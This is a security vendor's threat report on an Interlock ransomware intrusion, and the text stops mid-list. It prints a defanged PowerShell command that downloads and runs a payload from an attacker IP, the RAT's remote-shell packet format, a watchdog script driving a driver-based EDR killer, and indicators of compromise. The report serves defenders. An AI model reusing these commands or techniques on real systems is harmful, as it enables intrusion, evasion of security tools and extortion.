{
	"id": "3c24cb02-dcbd-4a92-88e6-3753fdba1bbc",
	"created_at": "2026-04-06T00:11:00.909968Z",
	"updated_at": "2026-04-10T03:36:47.901888Z",
	"deleted_at": null,
	"sha1_hash": "4077be8fa0679f7b8ed925e39a78ca41b5b35dbe",
	"title": "Interlock Ransomware: New Techniques, Same Old Tricks | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5980469,
	"plain_text": "Interlock Ransomware: New Techniques, Same Old Tricks | FortiGuard\r\nLabs\r\nPublished: 2026-01-29 · Archived: 2026-04-05 15:32:06 UTC\r\nAffected Platforms: North American Organizations – Education Sector\r\nThreat Type: Financially Motivated (Ransomware)\r\nImpact: Data Theft and Encryption, Extortion\r\nSeverity Level: Moderate\r\nExecutive Summary\r\nThe Interlock ransomware group continues to compromise organizations worldwide, with a focus on UK- and US-based\r\norganizations, particularly in the education sector. The FortiGuard Incident Response team continues to track the fallout of\r\nprevious campaigns related to this group. Unlike other current key ransomware threats, the Interlock group is unique in that\r\nit does not operate under the RaaS model. Instead, they appear to be a smaller, dedicated group of operators who develop\r\nand operate their own malware to support most of their kill chain. The Interlock ransomware group has demonstrated the\r\nability to adapt its techniques and tooling over time as mitigations evolve.\r\nThis blog outlines a recent intrusion involving this group and highlights the importance of organizations conducting regular\r\nthreat hunting to identify ongoing intrusions. Indicators associated with the early stage of this intrusion directly correlate\r\nwith those from a campaign reported by the eSentire Threat Response Unit in July this year, and with parts of the Interlock\r\nmalware ecosystem previously reported by Mandiant. Information from our investigation highlights new indicators that\r\norganizations should hunt for as this adversary continues to adapt its tooling.\r\nAs part of these adaptations, our analysis identified a novel process-killing tool developed by the group that leverages a\r\nzero-day vulnerability in a gaming anti-cheat driver. 
In this case, the tool was used to attempt to disable the victim’s EDR\r\nand AV tools.\r\nIntrusion Timeline\r\nThe following timeline outlines the broad stages of this intrusion, which are unpacked in greater detail in subsequent\r\nsections.\r\nIntrusion Details\r\nPhase One – Initial Access – 31 March 2025\r\nThe victim in this investigation was a North American-based education organization. Initial access to the victim’s\r\nenvironment was assessed as originating from a MintLoader infection, based on distinct PowerShell activity on an end\r\nuser’s laptop on 31 March 2025. The victim user did not have an EDR tool installed at the time of infection. The associated\r\nPowerShell command is shown below in Figure 1.\r\npowershell -w h -c \"iex $(irm 138[.]199[.]156[.]22:8080/$($z = [datetime]::UtcNow; $y = ([datetime]( '01/01/' + '1970'));\r\n$x = ($z - $y).TotalSeconds; $w = [math]::Floor($x); $v = $w - ($w % 16); [int64]$v))\"\\1\r\nFigure 1: PowerShell command associated with initial compromise. Note IP has been defanged.\r\nhttps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nPage 1 of 24\n\nOn execution, this script retrieves and executes a PowerShell payload from the URL\r\n‘138[.]199.156.22:8080/\u003ctime_since_epoch\u003e’. The URL structure associated with this script has previously been linked to a\r\nTAG-124 driven MintLoader campaign active at the time of this observed activity, and the command structure matches\r\nPowerShell scripts observed by Arctic Wolf in relation to other Interlock ransomware intrusions. Interlock ransomware\r\noperators have previously leveraged TAG-124 TDS infrastructure to identify and target victims across North America.\r\nAfter executing the above command, a zip file (download.zip) was created on the victim’s endpoint that contained a\r\nlegitimate Node.js runtime (node.exe).
It was used to execute a malicious JavaScript payload (j1wp4vw8.log, SHA1:\r\n63FD5E0811C0BCC7DF9FC3D712F39F829A8D6FF0). Analysis of the associated process chains and the JavaScript\r\npayload aligns with previous reporting by Mandiant, which appears to track this payload as an early version of\r\nCORNFLAKE, and by Quorum, which tracks this payload as NodeSnakeRAT.B. We refer to this malware family as\r\nNodeSnakeRAT throughout this article. As part of its operation, this malware writes many of its payloads to disk. The\r\nFortiGuard IR team retrieved those payloads listed in Table 1 below. Note that not all payloads executed through this\r\nimplant produce on-disk artifacts, so this is not a complete view of the operators’ activities, but it does provide some insight\r\ninto their operations.\r\nFunction\r\nFile \r\nName\r\nFile Path SHA1 Hash Embedded C2\r\nFirst\r\nObserved\r\nNodeSnakeRAT\r\nj1wp4v\r\nw8.log\r\nC:\\Users\u003cvictim_\r\nuser\u0026gt;\\AppData\\\r\nRoaming\\ node-v22.11.0-winx64\\\r\nj1wp4vw8.log\r\n63FD5E0811C0\r\nBCC7DF9FC3D\r\n712F39F829A8\r\nD6FF0\r\n216[.]245.184.181\r\n212[.]237.217.182\r\n168[.]119.96.41\r\nsuffering-arnold-satisfaction-prior[.] 
trycloudflare.com\r\nspeak-head-somebody-stays[.]trycloudflare.com\r\nmortgage-i-concrete-origins[.]trycloudflare.com\r\nuna-idol-ta-missile[.]trycloudflare.com\r\nstrain-brighton-focused-kw[.]trycloudflare.com\r\nmusicians-implied-less-model[.]trycloudflare.com\r\n31-March\r\n-2025\r\nInterlockRAT\r\nk4myl\r\ne3i.dll\r\nC:\\Users\u003cvictim_\r\nuser\u003e\\AppData\\\r\nRoaming\\3o55f\r\nai8\\k4myle3i.dll\r\n6445E5CE51DA\r\n03934395ABB5\r\n411D3200D12E\r\nD7B3\r\n45[.]61.136.109\r\n128[.]140.120.188\r\n177[.]136.225.135\r\n21-April\r\n-2025\r\nNodeSnakeRAT 05x3a\r\nay1.log\r\nC:\\Users\u003cvictim\r\n_user\u003e\\AppData\\\r\nRoaming\\ node-v22.11.0-winx64\\\r\n05x3aay1.log\r\n677151B9864F\r\n8D01DE3C1557\r\nB1402AF7EF99\r\nAE3D\r\n37[.]27.216.30\r\n66[.]85.173.36\r\n146[.]70.79.43\r\nnedy-throwing-knock-whats[.]trycloudflare[.]com\r\noclc-publishing-individual-maps[.]trycloudflare[.]com\r\ncf1-winows-ww[.]com\r\ntime-syncmicrosoft[.]com\r\nmicrosoft-iplcloud[.]com\r\nsublime-tragedy-counties-sculpture[.]trycloudflare[.]com\r\nchampagne-businesses-hand-theta[.]trycloudflare[.]com\r\nassets-msnds[.]org\r\n22-May\r\n-2025\r\nhttps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nPage 2 of 24\n\nsettings-win-datamicrosoft[.]org\r\nsettings-datamicrosoft[.]org\r\nperiodic-priest-games-assessed[.]trycloudflare[.]com\r\nuncertainty-por-bubble-persian[.]trycloudflare[.]com\r\neventsdatamicrosoft[.]org\r\ndns-teams-windows[.]live\r\nsync-time-win[.]live\r\nG-zip archive\r\nthat contains\r\nJava\r\nenvironment\r\nand internal\r\nJavaScript file\r\n‘jucheck.jar’\r\n9gesu\r\n23g.log\r\nC:\\Users\u003cvictim\r\n_user\u003e\\AppData\\\r\nRoaming\\ywgomm\r\n2t\\9gesu 23g.log\r\nF381C897A54\r\nB1A0A41D41F\r\n279ABA1B7C1\r\n3E3F901\r\nn/a\r\n24-June\r\n-2025\r\nInterlockRAT\r\naqwsx\r\nvvz.log\r\nC:\\Users\u003cvictim_\r\nuser\u003e\\AppData\\\r\nRoaming\\dji8zg3d\\\r\naqwsxvvz.log\r\nF3C2BDB448\r\n4F66213556B\r\n2CD5F114CE4\r\nF4A9DD 
86\r\n157[.]250.195.229\r\n216[.]219.95.234\r\n91[.]98.29.99\r\n04-\r\nSeptember-2025\r\nInterlockRAT\r\ng86oo\r\nfvm.dll\r\nC:\\Users\u003cvictim_\r\nuser\u003e\\AppData\\\r\nRoaming\\ ro5ry\r\nxiu\\g86oofvm.dll\r\nF3C2BDB4484\r\nF66213556B2C\r\nD5F114CE4F4A\r\n9DD86\r\n157[.]250.195.229\r\n216[.]219.95.234\r\n91[.]98.29.99\r\n04-\r\nSeptember-2025\r\nTable 1: Payloads dropped through NodeSnakeRAT implant on patient zero throughout intrusion.\r\nUsing the victim’s profile, an autorun entry ‘ChromeUpdater’ was created to establish persistence for NodeSnakeRAT on 31\r\nMarch 2025. It was later updated to include the newer NodeSnakeRAT payloads.\r\nOn April 3, 2025, three days after initial execution of the first NodeSnakeRAT implant (j1wp4vw8.log SHA1 -\r\n63FD5E0811C0BCC7DF9FC3D712F39F829A8D6FF0) on patient zero, a single, brief RDP connection was made from a\r\ntemporarily assigned IP within the victim’s environment to the main victim file server using a default Administrator account\r\nnot actively used by the victim’s organization. On April 21, 2025, the adversary leveraged their NodeSnakeRAT access to\r\nexecute a second JavaScript implant (k4myle3i.dll SHA1 - 6445E5CE51DA03934395ABB5411D3200D12ED7B3), which\r\nis an earlier iteration of Interlock RAT also tracked by Mandiant as WINDYTWIST.SEA and eSentire as Interlock\r\nBackdoor.\r\nBased on available evidence, the threat actor did not perform any significant activity for several months after the initial\r\ninfection. The next significant activity occurred on September 5, 2025, following the rotation of their infrastructure on\r\nSeptember 4, 2025, as shown in Table 1 above. The affected endpoint was an individual user’s laptop that was rarely\r\nattached to the victim’s corporate network. 
FortiGuard IR assessed that this is probably why the adversary was unable to\r\nmove laterally from this beachhead for several months: the timeframes during which the affected endpoint was\r\nconnected to the corporate environment did not overlap with the adversary's operating window.\r\nPhase Two – Data Access and Exfiltration – 05-15 September 2025\r\nThe next stage of this intrusion began on September 5, 2025, when the victim’s MDR service detected a similar\r\nNodeSnakeRAT infection chain on another application server in the victim’s environment. Given that the affected endpoint\r\nis an internal application server, the absence of evidence of MintLoader or other initial access methods, and the use of the\r\nsame NodeJS and subsequent JavaScript files, this phase was assessed as a continuation of the previous intrusion. Using this\r\nexisting access, the adversary delivered another Interlock RAT implant as a .log file (node.log; SHA1:\r\n2D5F88C396553669BD50183644D77AD3C71D72BB) that included new hardcoded infrastructure.\r\nAnalysis of Interlock RAT Implant\r\nThis second Interlock RAT payload is also obfuscated JavaScript. It contains more than 130 constant strings obtained\r\ndynamically by calling a string function with a unique ID at runtime. This technique inhibits complete static analysis and\r\nlimits the effectiveness of some string-based detection mechanisms. In the case of this payload, the function ‘a0n()’ is used\r\nto retrieve the constant strings by their ID. However, other publicly available samples indicate these function names are not\r\nconsistent and are likely randomized as part of each build. ‘const Y = a0n;’ indicates Y is a\r\nreference to the a0n() function. For clarity, code snippets in this section show resolved strings, making the code logic easier\r\nto understand. Figure 2
below demonstrates how the code leverages these dynamic strings. \r\nFigure 2: Code snippet using dynamic strings\r\nUpon execution, the payload collects system information from the victim’s device by executing the ‘systeminfo’ command\r\nthrough PowerShell. The harvested information includes the current user’s permissions (such as whether they are a user,\r\nadmin, or system), the domain, computer name, current username, and Windows versions. Figure 3 below shows a sample of\r\nthe collected information.\r\nFigure 3: Systeminfo is called to collect basic system information when the payload is first executed.\r\nAfter collecting system information, the malware sends it in plaintext to one of the C2 servers, as shown in Figure 4. This\r\npayload defines three hardcoded C2 server IPs in the payload, which are ‘157[.]250.195.229’, ‘216[.]219.95.234’ and\r\n‘64[.]190.113.235’. Two of them are obtained through the dynamic string function by their IDs. This is noted because not all\r\nC2 IPs can be obtained through static analysis. The server port is hardcoded to 443 for all identified C2 servers. \r\nFigure 4: Packet with sample of collected system information sent to hardcoded C2 IP during testing.\r\nThe first four bytes of this C2 traffic are a magic value (0xDF691155). The subsequent bytes contain the collected\r\ninformation in JSON format. The ‘iptarget’ field specifies the C2 server to which the data is sent. This first packet is\r\nhighlighted in detail because it is not encrypted, providing detection opportunities; subsequent packets are encrypted by the\r\npayload’s private encryption function. Each packet consists of two parts: a message header and message data (the command\r\ndata). 
The message header is XOR-encrypted with a constant key (0x4D in this payload), and the plain text message\r\nheader (0x0C in size) has the following layout:\r\nOffset Size Content\r\n+00 2 Command Type\r\n+04 2 Thread ID. The shell, command, socks5 features are handled by threads.\r\n+06 4 Size of the message data\r\n+08 4 Key to encrypt/decrypt the message data\r\nTable 2: Structure and contents of the message header.\r\nOnce the running implant has established a connection with the C2 server, the payload keeps the connection alive by sending a\r\nheartbeat packet on a timer (approximately every minute). The command type for such a packet is 0x1 (VOID).\r\nThe implant supports multiple command types, each providing additional functionality to support adversaries’ operations.\r\nTable 3 below lists all commands provided by this RAT sample. We provide additional information related to the SOCKS5,\r\nCONSOLE, and CONSOLE_ONE_COMMAND command types below.\r\nCommand Type Description\r\n00 SOCKS5\r\n01 VOID\r\n02 DISCONNECT\r\n03 CONSOLE\r\n04 OFF\r\n05 DELETE\r\n06 NEW_LAYING\r\n07 MV_LAYING\r\n08 SLEEP\r\n09 CONSOLE_ONE_COMMAND\r\nTable 3: Command matrix for Interlock RAT sample observed in this intrusion.\r\nSOCKS5 Proxy\r\nThe command type for SOCKS5 proxy is 0x00, the thread ID is 0xffff, and the key is randomly generated.
The following is a\r\nplaintext example of a complete SOCKS5 command (message header + message body):\r\nMessage Header   Message Body\r\n\\x00\\x00 \\xff\\xff \\x0f\\x00\\x00\\x00 \\x11\\x22\\x33\\x44\r\n+\r\n\\x00\\x00\\x00 \\x01 \\x08\\x09\\x0a\\x0b \\x33\\x33\r\n1 2 3 4 5 6 7 8\r\nMessage Header Breakdown   Message Body Breakdown\r\n  Value Function     Value Function\r\n1 x00\\x00 SOCKS5 command type   5 \\x00\\x00\\x00 Undefined\r\n2 \\xff\\xff\r\nThread Id (0xffff is\r\nundefined)\r\n  6 \\x01\r\nSOCKS5 server type flag\r\n1 for IP\r\n3 for domain\r\n3 \\x0f\\x00\\x00\\x00 Message body size   7 \\x08\\x09\\x0a\\x0b\r\nSOCKS5 server value – in this\r\nexample ‘8.9.10.11’\r\n4 \\x11\\x22\\x33\\x44\r\nKey to encrypt message\r\nbody (random)\r\n  8 \\x33\\x33\r\nTCP port for SOCKS5\r\nconnection\r\nUpon receiving the above sample command, the implant establishes a network connection to the operator-provided IP and\r\nport to provide SOCKS5 proxy service (note the IP and port in the above table are sample values). Figure 5 shows the\r\ncaptured SOCKS5 command from our controlled environment.\r\nhttps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nPage 5 of 24\n\nFigure 5: Captured command packet for SOCKS5.\r\nCONSOLE \r\nThe command type for CONSOLE is 0x03. It is used to establish a remote interactive shell between the C2 server and the\r\nvictim’s device. The command packet requires only the message header and ignores any message body data. Below is an\r\nexample of such a packet: \r\nMessage Header   Message Body (ignored for console command)\r\n\\x03\\x00 \\xff\\xff \\x00\\x00\\x00\\x00 \\x00\\x00\\x00\\x00\r\n+\r\n- - - -\r\n1 2 3 4 - - - -\r\nOnce the remote shell is established, the attacker can execute any Windows commands directly through the interactive shell. \r\nCONSOLE_ONE_COMMAND\r\nUsing this command, the attacker can execute Windows commands and receive their results. 
Below is a plaintext packet\r\nexample for executing the ‘dir c:\\’ command.\r\nMessage Header   Message Body\r\n\\x09\\x00 \\xff\\xff \\x08\\x00\\x00\\x00 \\x11\\x22\\x33\\x44\r\n+\r\n\\x64\\x69\\x72\\x20\\x43\\x3a\\x5c\\x5c\r\n1 2\u003c 3 4 5\r\nMessage Header Breakdown   Message Body Breakdown\r\n  Value Function     Value Function\r\n1 \\x00\\x00 SOCKS5 command type   5\r\n\\x64\\x69\\x72\\x20\\\r\nx43\\x3a\\x5c\\x5c\r\nCommand to be executed, in\r\nthis case ‘dir C:\\\\’\r\n2 \\xff\\xff\r\nThread Id (0xffff is\r\nundefined)\r\n \r\n3 \\x0f\\x00\\x00\\x00 Message body size  \r\n4 \\x11\\x22\\x33\\x44\r\nKey to encrypt message\r\nbody (random)\r\n \r\nFigure 6: An encrypted command packet and the corresponding response packet of the ‘dir C:\\\\’ command, which are both\r\nencrypted.\r\nSeveral instances of the Interlock RAT were deployed throughout this intrusion across several hosts. Details of the identified\r\nsamples are shown in Table 4 below, along with their C2 IP addresses to support hunting efforts.\r\nhttps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nPage 6 of 24\n\nFile Name File Path SHA1 Hash Embedded C2\r\nFirst\r\nObserved\r\nk4myle3i.dll\r\nC:\\Users\\\r\n\u003cvictim_user\u003e\\AppData\\Roaming\\\r\n3o55fai8\\k4myle3i.dll\r\n6445E5CE51DA03934395\r\nABB5411D3200D12ED7B3\r\n45[.]61.136.109\r\n128[.]140.120.188\r\n177[.]136.225.135\r\n21 April\r\n2025\r\naqwsxvvz.log\r\nC:\\Users\\\\AppData\\ 
Roaming\\\r\ndji8zg3d\\aqwsxvvz.log\r\nF3C2BDB4484F66213556\r\nB2CD5F114CE4F4A9DD86\r\n157[.]250.195.229\r\n216[.]219.95.234\r\n64[.]190.113.235\r\n04\r\nSeptember\r\n2025\r\ng86oofvm.dll\r\nC:\\Users\\\r\n\u003cvictim_user\u003e\\AppData\\Roaming\\\r\nro5ryxiu\\g86oofvm.dll\r\nF3C2BDB4484F66213556\r\nB2CD5F114CE4F4A9DD86\r\n157[.]250.195.229\r\n216[.]219.95.234\r\n64[.]190.113.235\r\n04\r\nSeptember\r\n2025\r\nnode.log\r\nC:\\Users\\\u003cvictim_user\u003e\\AppData\\\r\nRoaming\\\r\nnode-v22.11.0-win-x64\\node.log\r\n2D5F88C396553669BD50\r\n183644D77AD3C71D72BB\r\n157[.]250.195.229\r\n216[.]219.95.234\r\n64[.]190.113.235\r\n05\r\nSeptember\r\n2025\r\nTable 4: Interlock RAT C2 IPs extracted from identified samples.\r\nPersistence for these later-stage Interlock RAT implants was established using scheduled tasks. The scheduled task names\r\nused throughout this intrusion include ‘\\Microsoft\\Windows\\Defrag\\ScheduledDefrags’,\r\n‘\\Microsoft\\Windows\\Chkdsk\\TempDefrag’, ‘\\TimeSyncDrive’, ‘\\TimeSyncroDriver’, ‘\\TimeSync’, and ‘\\TimeSyncro’.\r\nUsing their Interlock RAT implants again, the adversary then began performing system discovery and enumeration. This was\r\nperformed using a PowerShell script (1.ps1) placed on the victim’s domain controller in an accessible share named\r\n‘Microsoft’. The script employs numerous forms of static obfuscation. A snippet is shown in Figure 7.\r\nFigure 7: Obfuscated PowerShell script (1.ps1) used for system discovery and enumeration across the victim’s environment.\r\nScreenConnect installation\r\nOn 13 September 2025, the adversary made a change to the tooling and began installing ScreenConnect. 
Installation was\r\nperformed using an MSI file (support.msi), which was likely created with Advanced Installer, based on the signature\r\ncommand structure identified after execution (see Figure 8 below).\r\nFigure 8: Anomalous PowerShell command structure typically indicative of the use of an MSI installer generated by\r\nAdvanced Installer.\r\nThis technique was employed across several user workstations and was operated effectively until at least October 9, 2025.\r\nDetails from the installation identified that the ScreenConnect service was configured to interact with the C2 domain\r\n‘user[.]kangaroosim[.]com’ which resolved to IP 91[.]92.241.179 at the time of infection. FortiGuard threat intelligence\r\nindicates that this is a known C2 domain associated with ScreenConnect usage, as shown in Figure 9.\r\nFigure 9: FortiGuard Threat Intelligence details related to the ScreenConnect C2 domain associated with the intrusion.\r\nFortiGuard IR assessed that this change in TTPs was likely because the adversary appeared more comfortable using the GUI\r\nto perform subsequent data exfiltration, and the victim's EDR tooling was impeding the adversary’s ability to consistently\r\nadvance their intrusion. Anomalous use of remote desktop tools, such as ScreenConnect, offers high-confidence detection\r\nopportunities and should be a focus for defenders seeking to mitigate ransomware-related threats.\r\nUsing this access, the adversary added an allow rule for RDP to the victim’s firewall using netsh.exe from an interactive\r\nPowerShell window.
Continuing to use their ScreenConnect access, the adversary was observed extensively browsing for\r\nkey files across compromised endpoints and victim file servers during September 14 and 15.\r\nOn September 15, the adversary interacted with a compromised user workstation via ScreenConnect and used RDP to\r\nestablish a session with the victim’s primary file server. During this session, the adversary created a copy of the AZcopy\r\nexecutable (win64.exe; SHA1: BE39DBADFC9CFC494F1B7BF3A04E49C336E0FA0D). AZcopy is an open-source\r\ncommand-line utility to support file upload to an Azure storage bucket and was used by the adversary to exfiltrate more than\r\n250GB of data from the victim’s file server. The use of this tooling for data exfiltration aligns with Cisco Talos reporting on\r\nInterlock ransomware activity from November 2024, further demonstrating consistency in its TTPs. This event was the only\r\nbulk exfiltration observed throughout this intrusion.\r\nPhase Three – Ransomware Preparation and Deployment – 16 September – 12 October 2025\r\nThere was a significant gap between when most of the data was exfiltrated from the victim’s network and when the threat\r\nactor began deploying ransomware across the victims’ endpoints. What’s also notable about these observations is that no\r\nadditional data exfiltration was observed following the significant AZcopy exfiltration. 
At this stage, FortiGuard assessed\r\nthat the ransomware operators had determined that extorting the victim’s data would not provide sufficient incentive for the\r\nvictim to pay the ransom, so they reverted to encryption to achieve this outcome.\r\nMost other ransomware operators we see typically use the double-extortion method up front, so this approach is anomalous.\r\nIn this intrusion, there were two different types of ransomware payloads: one to target Windows endpoints that was\r\nimplemented as a JavaScript file (jar.jar SHA1 - AD77FBDBB2FCBDB440428EED3E76D106E1119FCF), and a second\r\nthat was used to target the victim’s Nutanix hypervisor implemented as an ELF binary (script SHA1 -\r\nF5C6BD4E9686AFB0C4E7C1C1733FEBB4065D514F).\r\nThis transition to ransomware deployment kicked off on 10 October 2025 when the adversary laterally moved to the victim’s\r\nNutanix system via SSH using an existing administrator account. Using their access, the adversary identified logical disks\r\nand then transferred an ELF binary (script SHA1 - F5C6BD4E9686AFB0C4E7C1C1733FEBB4065D514F) believed to be a\r\nLinux implementation of Interlock ransomware. This binary was executed using the ‘setsid’ command to encrypt each\r\nidentified drive using the commands shown below in Figure 10.\r\nFigure 10: Command history associated with the Interlock operator encrypting drives on the victim’s Nutanix server using Interlock\r\nransomware (script) and then validating encryption.\r\nFollowing this activity, the adversary logged into the victim’s Prism Central server and verified that the logical disks had\r\nbeen encrypted with the ‘.!nt3rlock’ file extension, and that the corresponding ransom note had been placed.
A screenshot of\r\nthe associated ransom note is shown in Figure 11 below.\r\nFigure 11: Ransom note placed on an encrypted Nutanix server following encryption of all attached logical disks.\r\nThis initial encryption activity was followed by extensive enumeration of the victim’s Windows environment via RDP and\r\ninteractive PowerShell. The adversary used several LOLbins in their interactive PowerShell sessions, as shown in Figure 12,\r\nto collect and validate credentials, verify connectivity to key servers that would later be targeted by the ransomware, and\r\nuninstall or disable security software, namely FortiClient and FortiEDR.\r\nFigure 12: Commands executed via RDP access as part of ransomware preparation activity.\r\nThe final three commands are notable. The third last, ‘appwiz’, is a shortcut to the Programs and Features component of the\r\nWindows Control Panel, which can be used to install and uninstall programs on the victim’s endpoint. In the context of\r\nsubsequent commands, FortiGuard IR suspected the adversary attempted to identify security software using this\r\nfunctionality.
Following this activity, the adversary attempted to execute the following PowerShell command.\r\n$progPath = \".\\polers.dll\";\r\n$prc = \"Forti*\";\r\n$fPath = \"C:\\windows\\system32\\rundll32.exe\";\r\n$pArgs = $progPath + \" start \" + $prc;\r\n$delayS = 10\r\nif (-not (Test-Path $fPath)) {\r\n     exit 1;\r\n};\r\n$global:RunningProcs = @();\r\nfunction cl-p {\r\n     $global:RunningProcs = @(foreach ($p in $global:RunningProcs) {\r\n          if (Get-Process -Id $p.Id -ErrorAction SilentlyContinue) {\r\n               $p;\r\n          }\r\n     } )\r\n};\r\nwhile ($true) {\r\n     cl-p;\r\n     while ($global:RunningProcs.Count -ge 5) {\r\n          sleep 1; cl-p;\r\n     };\r\n     $proc = Start-Process -FilePath $fPath -Arg $pArgs -PassThru;\r\n     $global:RunningProcs = @($global:RunningProcs + $proc);\r\n     sleep $delayS;\r\n};\r\nFigure 13: PowerShell commands used to execute the EDR bypass tool ‘Hotta Killer’. Note that these have been reformatted\r\nfor readability.\r\nThe series of commands above executes ‘polers.dll’ through rundll32.exe proxy execution and keeps five instances of the\r\nprocess running: the cl-p function prunes exited processes from the tracked list, the inner loop sleeps in one-second intervals\r\nwhile five instances are alive, and a new instance is started whenever the count drops below five. This series of commands\r\neffectively functions as a watchdog, ensuring that the process is always running. Each instance results in the following\r\ncommand line:\r\nC:\\windows\\system32\\rundll32.exe .\\polers.dll start Forti*\r\nThe first attempt at this command failed because the operator was not in the correct directory to access the DLL, hence the\r\ncd command and duplicate command executions.
Analysis of this DLL (polers.dll, SHA1:\r\n3B9B2D5934F9ED1E3A000A760A6FA90422E8A555) identifies it as a new bring-your-own-vulnerable-driver (BYOVD)\r\nprocess-killer tool.\r\nHotta Killer malware code analysis\r\nUpon execution of the Hotta Killer (polers.dll), a separate payload DLL file is extracted and dropped into memory,\r\noverwriting the current code of polers.dll. This dynamic loading technique is common across the malware samples used by\r\nthe Interlock operator throughout this intrusion and, as noted earlier, is an effective anti-static analysis technique. The\r\nfollowing analysis is based entirely on the dynamically extracted payload DLL, which we refer to as ‘Hotta Killer’.\r\nAfter dynamic loading, the malware drops a kernel driver from memory into the current directory (‘E:\\’ in our testing). The\r\ndriver file is named ‘UpdateCheckerX64.sys’ with SHA1 - 7556AE58C215B8245A43F764F0676C7A8F0FDD1A. This\r\ndriver is a signed x64 native system driver and is a renamed version of an anti-cheat driver originally named\r\n‘GameDriverx64.sys’, vulnerable to CVE-2025-61155.\r\nTo install and start the system driver, it calls several native Windows APIs, including OpenSCManagerW(),\r\nCreateServiceW(), OpenServiceW() and StartServiceW().\r\nThe CreateServiceW() function is called with the following main parameters:\r\nParameter Value\r\nlpServiceName ‘UpdateCheckerX64_{random-numbers}’\r\nlpDisplayName ‘UpdateCheckerX64_{random-numbers}’\r\nlpBinaryPathName ‘E:\\UpdateCheckerX64.sys’\r\ndwServiceType 1, for “SERVICE_KERNEL_DRIVER”\r\ndwStartType 3, for “SERVICE_DEMAND_START”\r\nThe dwServiceType is set to 1 (SERVICE_KERNEL_DRIVER), indicating it’s a kernel driver. As a result, it does not\r\nappear in the Services list but does appear in the system registry.
Figure 14 shows the newly installed driver with the service\r\nname ‘UpdateCheckerX64_1763677393’.\r\nFigure 14: Installed kernel driver in the system registry.\r\nFollowing installation of the service driver, the payload DLL calls the CommandLineToArgvW() API to obtain the argument\r\n‘Forti*’ provided as command line input, which is subsequently formatted as ‘Forti*.exe’. Then, the payload DLL searches\r\namong the currently running processes for any process whose name matches the ‘Forti*.exe’ pattern using several Windows\r\nnative APIs, including CreateToolhelp32Snapshot(), Process32NextW() and Process32FirstW().\r\nAfter the malware retrieves the PID of a process matching the search pattern, it passes the PID to the loaded service driver\r\nthrough a created symbolic link, “\\\\\\\\.\\\\HtAntiCheatDriver”. It then calls the DeviceIoControl() API and places the obtained\r\nPID in the inBuffer parameter to attempt to kill the process linked to the provided PID. Figure 15 below depicts the pseudo\r\ncode in C that outlines key points of this process.\r\nFigure 15: Pseudo code shows mechanism used to send a target PID to the driver.\r\nWhen the service driver starts, its DriverEntry() function is called, which creates a ‘device’ and a symbolic link. To achieve\r\nthis, IoCreateDevice() is called with the DeviceName set to ‘\\\\Device\\\\HtAntiCheatDriver’, and IoCreateSymbolicLink() is\r\ncalled with the SymbolicLinkName set to ‘\\\\??\\\\HtAntiCheatDriver’. Once this link is established, the payload DLL can\r\ncommunicate with the driver through it. Next, the driver registers a callback function for the\r\nIRP_MJ_DEVICE_CONTROL major function, so that it is invoked automatically when data is received. The callback\r\nfunction reads the IoControlCode and checks whether the code is 0x222040 (see Figure 16 below).
It then verifies that the\r\nflag is 0xFA123456. If both checks pass, the function proceeds to read the PID from the input buffer and then calls the\r\nnative API, ZwTerminateProcess(), to terminate the process.\r\nFigure 16: ZwTerminateProcess() is called to kill a ‘Forti*.exe’ process specified by a provided PID sent to the buffer\r\nattached to symbolic link ‘\\\\??\\\\HtAntiCheatDriver’.\r\nAlthough it could be framed as a ‘novel EDR bypass tool’, Hotta Killer is more accurately considered an ‘elevated process\r\nkiller’ tool that, in this case, was used by the Interlock ransomware operator(s) to attempt to evade defenses by targeting\r\nFortinet security software. In this intrusion, the attempts to leverage this tool by using a nested loop didn’t affect the\r\noperation of the installed Fortinet software.\r\nDrivers related to anti-cheat software in video games have historically been leveraged by ransomware operators for the same\r\noutcome. Organizations should look to incorporate threat intelligence related to new tooling involving Bring Your Own\r\nVulnerable Driver (BYOVD) quickly into their security tooling to minimize the effectiveness of these tools and to create\r\ndetection opportunities.\r\nFollowing this attack, the adversary began encrypting victim endpoints using their ransomware.
The initial deployment of this ransomware was performed interactively via the adversaries’ ScreenConnect and RDP sessions using PowerShell ISE. FortiGuard IR determined that this initial deployment was performed to validate the deployment commands that would later be incorporated into a PowerShell script to deploy the ransomware more widely.\r\nJavaScript Ransomware (jar.jar) Code Analysis\r\nThe primary impact for this victim was through a malicious JavaScript file (jar.jar, SHA1 AD77FBDBB2FCBDB440428EED3E76D106E1119FCF) that was used to encrypt files on Windows endpoints across the victim’s environment. Note that the adversary used multiple files with this same name throughout the intrusion, and this naming convention has been linked to previous Interlock ransomware activity. The JavaScript ransomware employs multi-threading to encrypt files on a victim's machine as quickly as possible. There is no command and control (C2) server communication present in the code. The malware operates autonomously using a hardcoded RSA public key, meaning it does not need to contact a server to begin encryption.\r\nThe first function in the script, ‘reme’, sets up an obfuscated PowerShell command to delete the .jar file upon exit.\r\nFigure 17: ‘reme’ function used to support self-deletion of the JavaScript file on execution.\r\nThis function sets up a ShutdownHook to run when the program terminates. It also decodes and pieces together the PowerShell command ‘powershell.exe -Command sleep 5 ; rm '\u003cpath_to_jar\u003e'’. This command waits five seconds and then forcibly removes the malware file, hindering analysis.\r\nThe second function in the script, ‘lp’, recursively finds files within the victim’s endpoint filesystem while using a filter to avoid critical system directories and extensions.\r\nFigure 18: ‘lp’ function within the ransomware script.\r\nNote that the ‘filter’ variable is used to filter out excluded directories and excluded file types. The function also incorporates dir.listFiles(filter), which only returns files and directories that pass the filter's criteria. The filter itself is defined to return only the directories not in the EX_D set and files with extensions that do not match the EX_EXT set, effectively creating a target list while preserving system stability. The decoded values of these base64-encoded sets are shown below in Table 5.\r\nExcluded directories (EX_D): $Recycle.Bin, Boot, Documents and Settings, PerfLogs, ProgramData, Recovery, System Volume Information, Windows, $RECYCLE.BIN, AppData, WindowsApps, Windows Defender, WindowsPowerShell, Windows Defender Advanced Threat Protection, Java\r\nExcluded file extensions (EX_EXT): .bat, .bin, .cab, .cmd, .com, .cur, .diagcab, .diagcfg, .diagpkg, .drv, .hlp, .hta, .ico, .msi, .ocx, .psm1, 